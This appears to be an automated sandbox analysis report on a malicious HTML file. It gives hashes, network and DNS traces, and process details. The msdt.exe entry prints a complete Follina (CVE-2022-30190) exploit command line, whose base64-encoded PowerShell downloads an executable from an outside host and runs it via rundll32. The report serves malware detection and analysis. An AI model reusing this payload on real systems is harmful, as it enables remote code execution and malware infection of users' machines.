                    • Excluded domains from analysis (whitelisted): r5---sn-4g5e6nzs.gvt1.com, client.wns.windows.com, fs.microsoft.com, r2---sn-4g5e6nzz.gvt1.com, eudb.ris.api.iris.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, r5---sn-4g5ednsz.gvt1.com, r5.sn-4g5lznez.gvt1.com, arc.msn.com, ris.api.iris.microsoft.com, r4---sn-4g5e6nsk.gvt1.com, redirector.gvt1.com, update.googleapis.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, r5---sn-4g5lznez.gvt1.com, optimizationguide-pa.googleapis.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtWriteVirtualMemory calls found.
                    No simulations
                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    239.255.255.250Re ST ACH20228909340 LLC PAlD lNV 13487110.msgGet hashmaliciousBrowse
                      http://ganapichincha.com/Get hashmaliciousBrowse
                        https://netorg7402181-my.sharepoint.com/:f:/g/personal/tara_annjoy_com/Esig99VTc0pIgfnAde7rz-UBalQw3Lx7B-IJ7fU19RBqQA?e=izwctIGet hashmaliciousBrowse
                          https://elemaster-spa.jimdosite.com/Get hashmaliciousBrowse
                            https://t.ly/1heKGet hashmaliciousBrowse
                              http://h.parrable.comGet hashmaliciousBrowse
                                Voicemail_Records_8_31_2022 30402 pm_0e3a008a859e47219b1fdc1147c01815.htmlGet hashmaliciousBrowse
                                  Listen to voice message.htmGet hashmaliciousBrowse
                                    1024203777.test.htmlGet hashmaliciousBrowse
                                      1024203777.test.htmlGet hashmaliciousBrowse
                                        Ch-Comptes311 (2) (9).docxGet hashmaliciousBrowse
                                          Ch-Comptes311 (2) (9).docxGet hashmaliciousBrowse
                                            https://lpfhd-cmpzourl.maillist-manage.com/click.zc?m=1&mrd=1d79b6a1a2a07b1e&od=3z8b377741191d94fe97771047891c97a8e8153f971f4ac9ea9d47382d7a9b539b&linkDgs=1d79b6a1a28d0810&repDgs=1d79b6a1a2b10d7eGet hashmaliciousBrowse
                                              https://cloud.allynpachacusco.com/xdojGet hashmaliciousBrowse
                                                https://lpfhd-cmpzourl.maillist-manage.com/click.zc?m=1&mrd=1d79b6a1a2a07b1e&od=3z8b377741191d94fe97771047891c97a8e8153f971f4ac9ea9d47382d7a9b539b&linkDgs=1d79b6a1a28d0810&repDgs=1d79b6a1a2b00b96Get hashmaliciousBrowse
                                                  factura de compra.htmGet hashmaliciousBrowse
                                                    http://www.merge-now.orgGet hashmaliciousBrowse
                                                      56699_VM.htmGet hashmaliciousBrowse
                                                        http://sze5i.3xrvm.rekaangkaaksara.co.id.///?QQQ#.bWF4aW5lLmdhcmRuZXJAaXR2LmNvbQ==Get hashmaliciousBrowse
                                                          http://swuily-throass-fruarry.yolasite.comGet hashmaliciousBrowse
                                                            No context
                                                            No context
                                                            No context
                                                            No context
                                                            No created / dropped files found
                                                            File type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                            Entropy (8bit):6.049533660136345
                                                            TrID:
                                                              File name:fbGUvJ4AdV.html
                                                              File size:19189
                                                              MD5:da3469806af3aacbbbd22a763343fff2
                                                              SHA1:6d9fd23a4d32a5963c24d39b5402eeaf2a54f093
                                                              SHA256:c3afbf5a136b204e16eb6e1cf00cbb03ee36eff42f519f26f1d1d1e58f0b87e1
                                                              SHA512:7e0cbfb15bf2bc8bbbb1727ba9bcfc472bad56b6887457be564ab84b1d69c6ad81dc827e1d04cc57f3f3e4255494484073dee58a79a390e08fe3888939730a2d
                                                              SSDEEP:384:9W4t9eJgaU7XWH7/hjoNso7qSVUajB+IOFFUD6kNTPhFEsAll:neJgaUShENTHVFVwHM1phFEse
                                                              TLSH:A082C0A9D03658346DD45C134A753D96BD20FA75C4BC9B282E4CF72D532D4E1ED8283A
                                                              File Content Preview:<!DOctYpE hTmL>....<HtML>....<bodY>....<ScRiPT laNGUAGe="jscripT">....//Nn2wp6S4Yl6LHD8RlkuH2nRrwM4IwiGC2LqC6DJpN8XYHUc8JE1CS322bpIjLLlSzFr2pDpqdRNlULZdgV0m7sAoiC4lFm8MHONeXSmmMbu8RCnbuU8BXfdqJNfW9P9Ywgg9nOxJaWPpgS3g05gaFqEmQGOCbebhz32j6P95K6A0kX8Y1Cv7mnh
                                                              Icon Hash:78d0a8cccc88c460
                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Sep 2, 2022 15:28:54.879998922 CEST49749443192.168.2.3172.217.168.78
                                                              Sep 2, 2022 15:28:54.880044937 CEST44349749172.217.168.78192.168.2.3
                                                              Sep 2, 2022 15:28:54.880124092 CEST49749443192.168.2.3172.217.168.78
                                                              Sep 2, 2022 15:28:54.880600929 CEST49749443192.168.2.3172.217.168.78
                                                              Sep 2, 2022 15:28:54.880621910 CEST44349749172.217.168.78192.168.2.3
                                                              Sep 2, 2022 15:28:54.894287109 CEST49750443192.168.2.3216.58.215.237
                                                              Sep 2, 2022 15:28:54.894330978 CEST44349750216.58.215.237192.168.2.3
                                                              Sep 2, 2022 15:28:54.894418001 CEST49750443192.168.2.3216.58.215.237
                                                              Sep 2, 2022 15:28:54.894710064 CEST49750443192.168.2.3216.58.215.237
                                                              Sep 2, 2022 15:28:54.894727945 CEST44349750216.58.215.237192.168.2.3
                                                              Sep 2, 2022 15:28:54.943497896 CEST44349749172.217.168.78192.168.2.3
                                                              Sep 2, 2022 15:28:54.960045099 CEST44349750216.58.215.237192.168.2.3
                                                              Sep 2, 2022 15:28:54.989614010 CEST49750443192.168.2.3216.58.215.237
                                                              Sep 2, 2022 15:28:54.989650965 CEST44349750216.58.215.237192.168.2.3
                                                              Sep 2, 2022 15:28:54.989794970 CEST49749443192.168.2.3172.217.168.78
                                                              Sep 2, 2022 15:28:54.989814043 CEST44349749172.217.168.78192.168.2.3
                                                              Sep 2, 2022 15:28:54.990809917 CEST44349749172.217.168.78192.168.2.3
                                                              Sep 2, 2022 15:28:54.990840912 CEST44349749172.217.168.78192.168.2.3
                                                              Sep 2, 2022 15:28:54.990910053 CEST49749443192.168.2.3172.217.168.78
                                                              Sep 2, 2022 15:28:54.991908073 CEST44349750216.58.215.237192.168.2.3
                                                              Sep 2, 2022 15:28:54.992002010 CEST49750443192.168.2.3216.58.215.237
                                                              Sep 2, 2022 15:28:54.993104935 CEST44349749172.217.168.78192.168.2.3
                                                              Sep 2, 2022 15:28:54.993181944 CEST49749443192.168.2.3172.217.168.78
                                                              Sep 2, 2022 15:28:54.993199110 CEST44349749172.217.168.78192.168.2.3
                                                              Sep 2, 2022 15:28:55.175978899 CEST49749443192.168.2.3172.217.168.78
                                                              Sep 2, 2022 15:28:56.073260069 CEST49750443192.168.2.3216.58.215.237
                                                              Sep 2, 2022 15:28:56.073594093 CEST49750443192.168.2.3216.58.215.237
                                                              Sep 2, 2022 15:28:56.073594093 CEST44349750216.58.215.237192.168.2.3
                                                              Sep 2, 2022 15:28:56.073848963 CEST49749443192.168.2.3172.217.168.78
                                                              Sep 2, 2022 15:28:56.073986053 CEST49749443192.168.2.3172.217.168.78
                                                              Sep 2, 2022 15:28:56.074013948 CEST44349749172.217.168.78192.168.2.3
                                                              Sep 2, 2022 15:28:56.074413061 CEST44349749172.217.168.78192.168.2.3
                                                              Sep 2, 2022 15:28:56.109338999 CEST44349749172.217.168.78192.168.2.3
                                                              Sep 2, 2022 15:28:56.109447956 CEST49749443192.168.2.3172.217.168.78
                                                              Sep 2, 2022 15:28:56.109489918 CEST44349749172.217.168.78192.168.2.3
                                                              Sep 2, 2022 15:28:56.109589100 CEST44349749172.217.168.78192.168.2.3
                                                              Sep 2, 2022 15:28:56.109668970 CEST49749443192.168.2.3172.217.168.78
                                                              Sep 2, 2022 15:28:56.115366936 CEST44349750216.58.215.237192.168.2.3
                                                              Sep 2, 2022 15:28:56.130569935 CEST44349750216.58.215.237192.168.2.3
                                                              Sep 2, 2022 15:28:56.130816936 CEST49750443192.168.2.3216.58.215.237
                                                              Sep 2, 2022 15:28:56.130831957 CEST44349750216.58.215.237192.168.2.3
                                                              Sep 2, 2022 15:28:56.130899906 CEST49750443192.168.2.3216.58.215.237
                                                              Sep 2, 2022 15:28:56.146040916 CEST49750443192.168.2.3216.58.215.237
                                                              Sep 2, 2022 15:28:56.146084070 CEST44349750216.58.215.237192.168.2.3
                                                              Sep 2, 2022 15:28:56.148969889 CEST49749443192.168.2.3172.217.168.78
                                                              Sep 2, 2022 15:28:56.148992062 CEST44349749172.217.168.78192.168.2.3
                                                              Sep 2, 2022 15:28:57.917635918 CEST49756443192.168.2.3172.217.168.36
                                                              Sep 2, 2022 15:28:57.917695045 CEST44349756172.217.168.36192.168.2.3
                                                              Sep 2, 2022 15:28:57.917794943 CEST49756443192.168.2.3172.217.168.36
                                                              Sep 2, 2022 15:28:57.918090105 CEST49756443192.168.2.3172.217.168.36
                                                              Sep 2, 2022 15:28:57.918113947 CEST44349756172.217.168.36192.168.2.3
                                                              Sep 2, 2022 15:28:57.978068113 CEST44349756172.217.168.36192.168.2.3
                                                              Sep 2, 2022 15:28:57.983189106 CEST49756443192.168.2.3172.217.168.36
                                                              Sep 2, 2022 15:28:57.983237028 CEST44349756172.217.168.36192.168.2.3
                                                              Sep 2, 2022 15:28:57.984797001 CEST44349756172.217.168.36192.168.2.3
                                                              Sep 2, 2022 15:28:57.984909058 CEST49756443192.168.2.3172.217.168.36
                                                              Sep 2, 2022 15:28:57.987863064 CEST49756443192.168.2.3172.217.168.36
                                                              Sep 2, 2022 15:28:57.988006115 CEST44349756172.217.168.36192.168.2.3
                                                              Sep 2, 2022 15:28:58.068564892 CEST49756443192.168.2.3172.217.168.36
                                                              Sep 2, 2022 15:28:58.068614006 CEST44349756172.217.168.36192.168.2.3
                                                              Sep 2, 2022 15:28:58.181607008 CEST49756443192.168.2.3172.217.168.36
                                                              Sep 2, 2022 15:29:07.962944984 CEST44349756172.217.168.36192.168.2.3
                                                              Sep 2, 2022 15:29:07.963063955 CEST44349756172.217.168.36192.168.2.3
                                                              Sep 2, 2022 15:29:07.963167906 CEST49756443192.168.2.3172.217.168.36
                                                              Sep 2, 2022 15:29:08.197738886 CEST49756443192.168.2.3172.217.168.36
                                                              Sep 2, 2022 15:29:08.197777033 CEST44349756172.217.168.36192.168.2.3
                                                              Sep 2, 2022 15:29:58.076714039 CEST49810443192.168.2.3172.217.168.36
                                                              Sep 2, 2022 15:29:58.076778889 CEST44349810172.217.168.36192.168.2.3
                                                              Sep 2, 2022 15:29:58.076863050 CEST49810443192.168.2.3172.217.168.36
                                                              Sep 2, 2022 15:29:58.077224016 CEST49810443192.168.2.3172.217.168.36
                                                              Sep 2, 2022 15:29:58.077243090 CEST44349810172.217.168.36192.168.2.3
                                                              Sep 2, 2022 15:29:58.127197027 CEST44349810172.217.168.36192.168.2.3
                                                              Sep 2, 2022 15:29:58.155210972 CEST49810443192.168.2.3172.217.168.36
                                                              Sep 2, 2022 15:29:58.155257940 CEST44349810172.217.168.36192.168.2.3
                                                              Sep 2, 2022 15:29:58.155771017 CEST44349810172.217.168.36192.168.2.3
                                                              Sep 2, 2022 15:29:58.163119078 CEST49810443192.168.2.3172.217.168.36
                                                              Sep 2, 2022 15:29:58.163317919 CEST44349810172.217.168.36192.168.2.3
                                                              Sep 2, 2022 15:29:58.208867073 CEST49810443192.168.2.3172.217.168.36
                                                              Sep 2, 2022 15:30:08.124836922 CEST44349810172.217.168.36192.168.2.3
                                                              Sep 2, 2022 15:30:08.125193119 CEST44349810172.217.168.36192.168.2.3
                                                              Sep 2, 2022 15:30:08.125253916 CEST49810443192.168.2.3172.217.168.36
                                                              Sep 2, 2022 15:30:53.141551971 CEST49810443192.168.2.3172.217.168.36
                                                              Sep 2, 2022 15:30:53.141625881 CEST44349810172.217.168.36192.168.2.3
                                                              Sep 2, 2022 15:31:38.253438950 CEST49810443192.168.2.3172.217.168.36
                                                              Sep 2, 2022 15:31:38.253495932 CEST44349810172.217.168.36192.168.2.3
                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Sep 2, 2022 15:28:54.772237062 CEST5113953192.168.2.38.8.8.8
                                                              Sep 2, 2022 15:28:54.772720098 CEST5295553192.168.2.38.8.8.8
                                                              Sep 2, 2022 15:28:54.799750090 CEST53529558.8.8.8192.168.2.3
                                                              Sep 2, 2022 15:28:54.801990986 CEST53511398.8.8.8192.168.2.3
                                                              Sep 2, 2022 15:28:57.896194935 CEST5770453192.168.2.38.8.8.8
                                                              Sep 2, 2022 15:28:57.915808916 CEST53577048.8.8.8192.168.2.3
                                                              Sep 2, 2022 15:29:57.981518030 CEST5811953192.168.2.38.8.8.8
                                                              Sep 2, 2022 15:29:58.001106977 CEST53581198.8.8.8192.168.2.3
                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                              Sep 2, 2022 15:28:54.772237062 CEST192.168.2.38.8.8.80x5880Standard query (0)clients2.google.comA (IP address)IN (0x0001)
                                                              Sep 2, 2022 15:28:54.772720098 CEST192.168.2.38.8.8.80xbec1Standard query (0)accounts.google.comA (IP address)IN (0x0001)
                                                              Sep 2, 2022 15:28:57.896194935 CEST192.168.2.38.8.8.80x7fb0Standard query (0)www.google.comA (IP address)IN (0x0001)
                                                              Sep 2, 2022 15:29:57.981518030 CEST192.168.2.38.8.8.80x9f76Standard query (0)www.google.comA (IP address)IN (0x0001)
                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                              Sep 2, 2022 15:28:54.799750090 CEST8.8.8.8192.168.2.30xbec1No error (0)accounts.google.com216.58.215.237A (IP address)IN (0x0001)
                                                              Sep 2, 2022 15:28:54.801990986 CEST8.8.8.8192.168.2.30x5880No error (0)clients2.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)
                                                              Sep 2, 2022 15:28:54.801990986 CEST8.8.8.8192.168.2.30x5880No error (0)clients.l.google.com172.217.168.78A (IP address)IN (0x0001)
                                                              Sep 2, 2022 15:28:57.915808916 CEST8.8.8.8192.168.2.30x7fb0No error (0)www.google.com172.217.168.36A (IP address)IN (0x0001)
                                                              Sep 2, 2022 15:29:58.001106977 CEST8.8.8.8192.168.2.30x9f76No error (0)www.google.com172.217.168.36A (IP address)IN (0x0001)
                                                              • accounts.google.com
                                                              • clients2.google.com
                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              0192.168.2.349750216.58.215.237443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampkBytes transferredDirectionData
                                                              2022-09-02 13:28:56 UTC0OUTPOST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1
                                                              Host: accounts.google.com
                                                              Connection: keep-alive
                                                              Content-Length: 1
                                                              Origin: https://www.google.com
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Sec-Fetch-Site: none
                                                              Sec-Fetch-Mode: no-cors
                                                              Sec-Fetch-Dest: empty
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              Cookie: CONSENT=PENDING+904; AEC=AakniGO7HqlHWlnoY-P22_SwwnNSfVGxlF1NgK5nuj5WLe313NyJi16g7z4; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg; NID=511=nUT82hOv6CVwMNqDg-sTtCMJJ6SQ1v_cCpfCpf5nt8EolEbal01GWFyjG01tqWQgh9ciRU880J6nLd2gdbhAJs44PsHAZaVQAFIbrqe2FmFgjrAAK7W9Z8u5LDvwsuZRng98jP6E23SJ4fsPIs326YmnuCwa92dRRCcB6MNeI_o
                                                              2022-09-02 13:28:56 UTC0OUTData Raw: 20
                                                              Data Ascii:
                                                              2022-09-02 13:28:56 UTC3INHTTP/1.1 200 OK
                                                              Content-Type: application/json; charset=utf-8
                                                              Access-Control-Allow-Origin: https://www.google.com
                                                              Access-Control-Allow-Credentials: true
                                                              X-Content-Type-Options: nosniff
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 02 Sep 2022 13:28:56 GMT
                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                              Report-To: {"group":"IdentityListAccountsHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/IdentityListAccountsHttp/external"}]}
                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-0X5lVZWT_mNw5ovhaKMYPg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/IdentityListAccountsHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/IdentityListAccountsHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/IdentityListAccountsHttp/cspreport
                                                              Cross-Origin-Opener-Policy: same-origin; report-to="IdentityListAccountsHttp"
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Server: ESF
                                                              X-XSS-Protection: 0
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                              Accept-Ranges: none
                                                              Vary: Accept-Encoding
                                                              Connection: close
                                                              Transfer-Encoding: chunked
                                                              2022-09-02 13:28:56 UTC4INData Raw: 31 31 0d 0a 5b 22 67 61 69 61 2e 6c 2e 61 2e 72 22 2c 5b 5d 5d 0d 0a
                                                              Data Ascii: 11["gaia.l.a.r",[]]
                                                              2022-09-02 13:28:56 UTC4INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              1192.168.2.349749172.217.168.78443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampkBytes transferredDirectionData
                                                              2022-09-02 13:28:56 UTC0OUTGET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1
                                                              Host: clients2.google.com
                                                              Connection: keep-alive
                                                              X-Goog-Update-Interactivity: fg
                                                              X-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda
                                                              X-Goog-Update-Updater: chromecrx-104.0.5112.81
                                                              Sec-Fetch-Site: none
                                                              Sec-Fetch-Mode: no-cors
                                                              Sec-Fetch-Dest: empty
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              2022-09-02 13:28:56 UTC1INHTTP/1.1 200 OK
                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-2NqIu_3Ygyr6l2RUZH06pw' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 02 Sep 2022 13:28:56 GMT
                                                              Content-Type: text/xml; charset=UTF-8
                                                              X-Daynum: 5723
                                                              X-Daystart: 23336
                                                              X-Content-Type-Options: nosniff
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-XSS-Protection: 1; mode=block
                                                              Server: GSE
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                              Accept-Ranges: none
                                                              Vary: Accept-Encoding
                                                              Connection: close
                                                              Transfer-Encoding: chunked
                                                              2022-09-02 13:28:56 UTC2INData Raw: 32 63 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 67 75 70 64 61 74 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 75 70 64 61 74 65 32 2f 72 65 73 70 6f 6e 73 65 22 20 70 72 6f 74 6f 63 6f 6c 3d 22 32 2e 30 22 20 73 65 72 76 65 72 3d 22 70 72 6f 64 22 3e 3c 64 61 79 73 74 61 72 74 20 65 6c 61 70 73 65 64 5f 64 61 79 73 3d 22 35 37 32 33 22 20 65 6c 61 70 73 65 64 5f 73 65 63 6f 6e 64 73 3d 22 32 33 33 33 36 22 2f 3e 3c 61 70 70 20 61 70 70 69 64 3d 22 6e 6d 6d 68 6b 6b 65 67 63 63 61 67 64 6c 64 67 69 69 6d 65 64 70 69 63 63 6d 67 6d 69 65 64 61 22 20 63 6f 68 6f 72 74 3d 22 31 3a 3a 22 20 63 6f 68 6f 72 74 6e 61 6d 65 3d 22 22
                                                              Data Ascii: 2ca<?xml version="1.0" encoding="UTF-8"?><gupdate xmlns="http://www.google.com/update2/response" protocol="2.0" server="prod"><daystart elapsed_days="5723" elapsed_seconds="23336"/><app appid="nmmhkkegccagdldgiimedpiccmgmieda" cohort="1::" cohortname=""
                                                              2022-09-02 13:28:56 UTC2INData Raw: 6d 6d 68 6b 6b 65 67 63 63 61 67 64 6c 64 67 69 69 6d 65 64 70 69 63 63 6d 67 6d 69 65 64 61 2e 63 72 78 22 20 66 70 3d 22 31 2e 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 68 61 73 68 5f 73 68 61 32 35 36 3d 22 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 70 72 6f 74 65 63 74 65 64 3d 22 30 22 20 73 69 7a 65 3d 22 32 34 38 35 33 31 22 20 73 74 61 74 75 73 3d 22 6f 6b 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 2e 30 2e 36 22 2f 3e 3c 2f 61 70 70 3e 3c 2f
                                                              Data Ascii: mmhkkegccagdldgiimedpiccmgmieda.crx" fp="1.81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" hash_sha256="81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" protected="0" size="248531" status="ok" version="1.0.0.6"/></app></
                                                              2022-09-02 13:28:56 UTC3INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Click to jump to process

                                                              Click to jump to process

                                                              Click to dive into process behavior distribution

                                                              Click to jump to process

                                                              Target ID:0
                                                              Start time:15:28:47
                                                              Start date:02/09/2022
                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
                                                              Imagebase:0x7ff614650000
                                                              File size:2851656 bytes
                                                              MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:moderate

                                                              Target ID:2
                                                              Start time:15:28:52
                                                              Start date:02/09/2022
                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1948 --field-trial-handle=1740,i,14618335365964935446,5264089186027307751,131072 /prefetch:8
                                                              Imagebase:0x7ff614650000
                                                              File size:2851656 bytes
                                                              MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:moderate

                                                              Target ID:3
                                                              Start time:15:28:52
                                                              Start date:02/09/2022
                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\fbGUvJ4AdV.html
                                                              Imagebase:0x7ff614650000
                                                              File size:2851656 bytes
                                                              MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:moderate

                                                              Target ID:16
                                                              Start time:15:29:57
                                                              Start date:02/09/2022
                                                              Path:C:\Windows\System32\msdt.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\system32\msdt.exe" ms-msdt:/Id%20PcwDiagnOstic%20-skIP%20FORCE%20-paraM%20%22It_ReBrOwsefoRfILE=#fbK%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=I$(Iex($(Iex('[SYStem.teXT.eNCoDiNG]'+[ChaR]0x3A+[cHaR]58+'UTF8.gEtSTRInG([SYStEm.conVeRT]'+[CHAR]58+[ChAR]58+'fROmbasE64strInG('+[ChaR]0X22+'c1RPcC1QUk9jZXNzIC1GT1JDZSAtTkFtZSAnbXNkdCc7JHNZID0gQWRkLVRZcEUgLW1FbUJFUmRFRmluaXRpT04gJ1tEbGxJbXBvcnQoInVSTE1vbi5kTEwiLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIHUsc3RyaW5nIEksc3RyaW5nIGMsdWludCBzUCxJbnRQdHIgVik7JyAtTmFtZSAibHhQIiAtTmFtRVNwQWNlIEtJeCAtUGFzc1RocnU7ICRzWTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cHM6Ly9hLnBvbWYuY2F0L2lwcmlnay5leGUiLCIkZW5WOkFQUERBVEFcQ2JodHIuZXhlIiwwLDApO1NUQVJ0LVNMRWVwKDMpO1J1bkRsbDMyLkVYZSB6aXBmbGRyLmRsbCxSb3V0ZVRoZUNhbGwgIiRFbnY6QVBQREFUQVxDYmh0ci5leGUiO3NUb3AtUFJPQ0VzcyAtZm9SQ0UgLU5hbWUgJ3NkaWFnbmhvc3Qn'+[Char]34+'))'))))Ti/../../../../../../../../../../.mSi%20%22
                                                              Imagebase:0x7ff7d5070000
                                                              File size:1560576 bytes
                                                              MD5 hash:8BE43BAF1F37DA5AB31A53CA1C07EE0C
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 00000010.00000002.697950028.0000023881AC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 00000010.00000002.698155124.0000023881B59000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 00000010.00000002.698121675.0000023881B50000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:moderate

                                                              Call Graph

                                                              • Executed
                                                              • Not Executed
                                                              callgraph clusterC0 E1C0 entry:C0

                                                              Script:

                                                              Code
                                                              0
